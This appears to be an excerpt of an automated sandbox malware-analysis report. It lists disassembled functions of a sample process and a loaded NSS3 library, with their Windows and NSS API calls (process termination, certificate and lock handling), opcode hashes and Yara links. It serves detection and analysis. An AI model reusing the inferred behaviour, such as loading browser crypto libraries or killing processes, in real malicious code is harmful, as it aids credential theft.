Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 49902f81ab7f2581298fcd9f697a592fb6633b854689d8330088bfeaba10d861
Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
Opcode Fuzzy Hash: 49902f81ab7f2581298fcd9f697a592fb6633b854689d8330088bfeaba10d861
Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00415BD0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00415BEB

Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478

OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
CloseHandle.KERNEL32(00000000), ref: 00415CD6

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 0001e0c322c3891ff48e056e23e0179b631be68b8fe34888cc1b460e510a76d2
Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
Opcode Fuzzy Hash: 0001e0c322c3891ff48e056e23e0179b631be68b8fe34888cc1b460e510a76d2
Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6BD3AAA2 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BDD0D9C,00000000), ref: 6BD3AAD4
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6BDD0DA8,00000000), ref: 6BD3AAE3

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: _initialize_onexit_table
String ID:
API String ID: 2450287516-0
Opcode ID: ccf7f081d9cbc79cfca461f2938c1d0b7bd85f7a8ca8746bdc5fac51bcca4865
Instruction ID: e77240b5d04bc889be24956cbbf33af51404853adb65a35ef38868ee808ab143
Opcode Fuzzy Hash: ccf7f081d9cbc79cfca461f2938c1d0b7bd85f7a8ca8746bdc5fac51bcca4865
Instruction Fuzzy Hash: 8F21F572E00625ABDF00DF78D90168E77BA9F47374F004066EC54EF292D779EA40ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 6BCC5AF0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BCC5B0F
EnterCriticalSection.KERNEL32(?), ref: 6BCC5B23
PR_SetError.NSS3(00000000,00000000), ref: 6BCC5B80
PR_Unlock.NSS3(?), ref: 6BCC5B8E

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 927df0fc98bd8897485fb0e21af70274712f4acdaa195f9b7931fc2b6ba42caf
Instruction ID: 64dcf8f1c5fa9c9e114d51f600424269093ce3f92f86815ab8a06428e7d48565
Opcode Fuzzy Hash: 927df0fc98bd8897485fb0e21af70274712f4acdaa195f9b7931fc2b6ba42caf
Instruction Fuzzy Hash: 5B213671E102156FEB009B78DC97B67BB68BF16724F040125EE059B241F738E650C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6BC9ABF0 Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON

Download Yara Rule

APIs

CERT_GetFirstEmailAddress.NSS3(?), ref: 6BC9AC0B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6BC9AC26
PR_Now.NSS3 ref: 6BC9AC34
CERT_GetNextEmailAddress.NSS3(?,00000000), ref: 6BC9AC6E

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: AddressEmail$FirstNextstrcmp
String ID:
API String ID: 3008928262-0
Opcode ID: f97379e9979e587bd5f0a749edf1b2fec674acc18393c6a5995190a7648a68a4
Instruction ID: 37f5e704792d4ce4bc1e01d2a841e410a405f6e60b7eb608c1e8b8bd29ea1890
Opcode Fuzzy Hash: f97379e9979e587bd5f0a749edf1b2fec674acc18393c6a5995190a7648a68a4
Instruction Fuzzy Hash: 3111DA71E112055FB710BF7DAC8296B77D8EF85264B000474FD68CB212FB2AEA1486A2

Uniqueness

Uniqueness Score: -1.00%

Function 6BCB1B10 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6BC83147,?,?), ref: 6BCB1B41
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6BC83147,?,?), ref: 6BCB1B51
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BC83147), ref: 6BCB1B7C
PR_SetError.NSS3(00000000,00000000), ref: 6BCB1B94

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: c2a9bc4be4d542e992a07334c20d12e82936ca5e4117eae440e0d2a91dac2d1e
Instruction ID: 807cef54f10abdf8306428a3cbcd300382d2cffd8c75b39f929034ed10f58d31
Opcode Fuzzy Hash: c2a9bc4be4d542e992a07334c20d12e82936ca5e4117eae440e0d2a91dac2d1e
Instruction Fuzzy Hash: E221C5B5D101299BEB00AF68DC41AAEB7B8FF09714F444165ED45AB201FB35EA108BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BD8CB30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6BD39890: TlsGetValue.KERNEL32(?,?,?,6BD397EB), ref: 6BD3989E

EnterCriticalSection.KERNEL32(0000001E,?,?,00000000,?,6BD05262,?,?,?,6BCFE333,?,?,6BCFDC77), ref: 6BD8CB47
_PR_MD_UNLOCK.NSS3(-0000001A,?,6BD05262,?,?,?,6BCFE333,?,?,6BCFDC77), ref: 6BD8CB99
_PR_MD_NOTIFYALL_CV.NSS3(?,?,?,6BD05262,?,?,?,6BCFE333,?,?,6BCFDC77), ref: 6BD8CBC3
_PR_MD_NOTIFY_CV.NSS3(?,?,?,6BD05262,?,?,?,6BCFE333,?,?,6BCFDC77), ref: 6BD8CBD2

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: CriticalEnterSectionValue
String ID:
API String ID: 2782078792-0
Opcode ID: abd97195f7ddc764a68a96dcd8b4daa9e0fccfe7d4a3020727010d315d6493e2
Instruction ID: 8881ab5faccbe14120e5116851d28e274531c37e2b50e13b8c16a1613b28b249
Opcode Fuzzy Hash: abd97195f7ddc764a68a96dcd8b4daa9e0fccfe7d4a3020727010d315d6493e2
Instruction Fuzzy Hash: 1711AF72C11A15EBD3148F31C841A06B3A4FF0137AF188269D8099B612E73DB9D1CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6BC6EAD0 Relevance: 6.1, APIs: 4, Instructions: 54networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6BC6EB13
htonl.WSOCK32(00000000,?), ref: 6BC6EB26
htons.WSOCK32(?), ref: 6BC6EB44
PR_GetCurrentThread.NSS3(?), ref: 6BC6EB58

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: htons$CurrentThreadhtonl
String ID:
API String ID: 2156189399-0
Opcode ID: cbc62e1b4acf20cab8c95c877fd339daf9d57ed545b752afe09afee7eea8f137
Instruction ID: f329721c2bc2dd7afc69f32fe0eb45bcea90fcd9e45d7ca4f3221742153dd70a
Opcode Fuzzy Hash: cbc62e1b4acf20cab8c95c877fd339daf9d57ed545b752afe09afee7eea8f137
Instruction Fuzzy Hash: B8119061D34B9297D3108F758C81A7673A4BFD5755B01AB0FE8CA46521F778A2C0C318

Uniqueness

Uniqueness Score: -1.00%

Function 6BD01AF0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6BDD2F88,6BD00660), ref: 6BD01B08

Part of subcall function 6BBF4C70: TlsGetValue.KERNEL32(?,?,?,6BBF3921,6BDD14E4,6BD3CC70), ref: 6BBF4C97
Part of subcall function 6BBF4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6BBF3921,6BDD14E4,6BD3CC70), ref: 6BBF4CB0
Part of subcall function 6BBF4C70: PR_Unlock.NSS3(?,?,?,?,?,6BBF3921,6BDD14E4,6BD3CC70), ref: 6BBF4CC9

Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607AD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607CD
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BBF204A), ref: 6BC607D6
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BBF204A), ref: 6BC607E4
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,6BBF204A), ref: 6BC60864
Part of subcall function 6BC607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BC60880
Part of subcall function 6BC607A0: TlsSetValue.KERNEL32(00000000,?,?,6BBF204A), ref: 6BC608CB
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608D7
Part of subcall function 6BC607A0: TlsGetValue.KERNEL32(?,?,6BBF204A), ref: 6BC608FB

TlsGetValue.KERNEL32 ref: 6BD01B1C
EnterCriticalSection.KERNEL32(?), ref: 6BD01B2C
PR_Unlock.NSS3 ref: 6BD01B79

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$CallOnce
String ID:
API String ID: 3443561666-0
Opcode ID: 9e3fff45aa2a0d8a5e7aefc01275bb997653339a46913dc306500d539083958b
Instruction ID: a9d21148f12e197fd82b76f3153aff352bd0ea14e47dbf1847a2d199d4048bc4
Opcode Fuzzy Hash: 9e3fff45aa2a0d8a5e7aefc01275bb997653339a46913dc306500d539083958b
Instruction Fuzzy Hash: 5A11C2B4E002159FFB045F39D805A19B7B8EB97B2DF0448A8F4489F251FB39D4949790

Uniqueness

Uniqueness Score: -1.00%

Function 6BD02BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BD02A28,00000060,00000001), ref: 6BD02BF0

Part of subcall function 6BC795B0: TlsGetValue.KERNEL32(00000000,?,6BC900D2,00000000), ref: 6BC795D2
Part of subcall function 6BC795B0: EnterCriticalSection.KERNEL32(?,?,?,6BC900D2,00000000), ref: 6BC795E7
Part of subcall function 6BC795B0: PR_Unlock.NSS3(?,?,?,?,6BC900D2,00000000), ref: 6BC79605

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6BD02A28,00000060,00000001), ref: 6BD02C07
SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6BD02A28,00000060,00000001), ref: 6BD02C1E
free.MOZGLUE(?,00000000,00000000,?,6BD02A28,00000060,00000001), ref: 6BD02C4A

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
String ID:
API String ID: 358400960-0
Opcode ID: 0ad76af975d80ce9bccea37e05e3c623e26ee6bd4081399cf67aa51690c643b7
Instruction ID: 73d2f75fae00b493b51235f9c55c59efc2dfedb983a79f7301197cf5c1ed6e38
Opcode Fuzzy Hash: 0ad76af975d80ce9bccea37e05e3c623e26ee6bd4081399cf67aa51690c643b7
Instruction Fuzzy Hash: 8F018EB5E007009BEB20CF369905B03B7F8AF55658F040A28E88ACB641FB39F248C795

Uniqueness

Uniqueness Score: -1.00%

Function 00414ED0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
HeapAlloc.KERNEL32(00000000), ref: 00414F23
wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

%dx%d, xrefs: 00414F34

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00416F20 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00416F72
lstrcat.KERNEL32(00000000), ref: 00416F82

Strings

6F@, xrefs: 00416F37
6F@, xrefs: 00416F29

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: 6F@$6F@
API String ID: 3905823039-140834422
Opcode ID: 0fd21debb5ed307de285645c5bfc8b86321b2cbbfd8b437667256a76d532ad3c
Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
Opcode Fuzzy Hash: 0fd21debb5ed307de285645c5bfc8b86321b2cbbfd8b437667256a76d532ad3c
Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6BC77B00 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

SECITEM_ItemsAreEqual_Util.NSS3(?,6BD99030), ref: 6BC77B15

Part of subcall function 6BCCFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6BC71A3E,00000048,00000054), ref: 6BCCFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6BD99048), ref: 6BC77B29
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6BC77B46
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BC77B60

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Util$Equal_Items$CopyErrorItem_memcmp
String ID:
API String ID: 608361559-0
Opcode ID: 470201d8164398a74f1b8e49c64297ba4f7f9ea9c0c17677aa48a55dcb4fa604
Instruction ID: ed95c4b679114596d0edcf566e1dd6ed9442a01c47a08d0b6d27c71db1cf119d
Opcode Fuzzy Hash: 470201d8164398a74f1b8e49c64297ba4f7f9ea9c0c17677aa48a55dcb4fa604
Instruction Fuzzy Hash: 71F0F635A650182AEA2027657C16F6B3328C762A6AF10003AAE09DA241F75DE31940F6

Uniqueness

Uniqueness Score: -1.00%

Function 00414450 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
HeapAlloc.KERNEL32(00000000), ref: 00414464
GetLocalTime.KERNEL32(?), ref: 00414471
wsprintfA.USER32 ref: 004144A0

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 6BD85AD0 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6BD85ADC

Part of subcall function 6BD39BF0: TlsGetValue.KERNEL32(?,?,?,6BD80A75), ref: 6BD39C07

PR_Free.NSS3(?), ref: 6BD85AFE
PR_DestroyLock.NSS3(?), ref: 6BD85B09
PR_Free.NSS3(?), ref: 6BD85B12

Memory Dump Source

Source File: 00000001.00000002.2100857376.000000006BBF1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BBF0000, based on PE: true

Associated: 00000001.00000002.2100824423.000000006BBF0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101124895.000000006BD8F000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101204782.000000006BDCE000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101266174.000000006BDCF000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101302236.000000006BDD0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2101331765.000000006BDD5000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bbf0000_u5g0.jbxd

Similarity

API ID: Free$CurrentDestroyLockThreadValue
String ID:
API String ID: 1384236848-0
Opcode ID: 49d23f52de86d6e47bc300dbb8872e7fb1c123b60880c68edb7e10c47cae8042
Instruction ID: 6611162ea30569804b1d15181f832415e4f8147fe559649301ff717ee94a4b99
Opcode Fuzzy Hash: 49d23f52de86d6e47bc300dbb8872e7fb1c123b60880c68edb7e10c47cae8042
Instruction Fuzzy Hash: BDF0E5B1D042209BE7409F34F882A473298AF02239B40447AD80FCB223EB3DE550C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 00415260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetSystemTime.KERNEL32(?,02F31E18,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Strings

#F@, xrefs: 004152B1, 004152E1, 004152E4
#F@, xrefs: 0041526C, 004152E5, 004152F0, 00415304, 004152D3, 004152F3

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

